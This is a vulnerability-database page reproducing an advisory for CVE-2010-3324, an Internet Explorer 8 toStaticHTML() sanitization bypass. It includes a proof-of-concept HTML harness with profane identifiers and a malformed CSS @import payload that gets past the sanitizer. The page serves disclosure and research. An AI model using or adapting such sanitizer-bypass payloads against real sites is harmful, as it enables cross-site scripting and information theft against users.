Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2010-3324

Publish Date: 16 Aug 2010

                							

                source: http://www.securityfocus.com/bid/42467/info

Internet Explorer 8 is prone to a security-bypass weakness.

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.

Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 

&lt;script type="text/javascript"&gt;
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
&lt;/script&gt;

&lt;form name="shit"&gt;
&lt;textarea name=&amp;#039;input&amp;#039; cols=40 rows=20&gt;
&amp;lt;/textarea&amp;gt;
&lt;textarea name=&amp;#039;output&amp;#039; cols=40 rows=20&gt;
&amp;lt;/textarea&amp;gt;

&lt;input type=button value="fuck_me" name="fuck" onclick=fuckie();&gt;
&lt;/form&gt;


&lt;style&gt;

} () import &lt;%7D () import&gt; url(&amp;#039;//127.0.0.1/1.css&amp;#039;);aaa

{;}

&lt;/style&gt;

&lt;div id="x"&gt;Fuck Ie&lt;/div&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass

Vulmon Search

About

Products

Connect